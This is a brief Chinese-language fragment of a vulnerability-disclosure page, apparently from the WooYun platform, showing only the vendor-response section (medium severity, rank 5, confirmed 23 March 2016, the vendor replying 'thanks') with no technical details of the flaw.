版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-03-23 11:53

厂商回复:

谢谢

最新状态:

暂无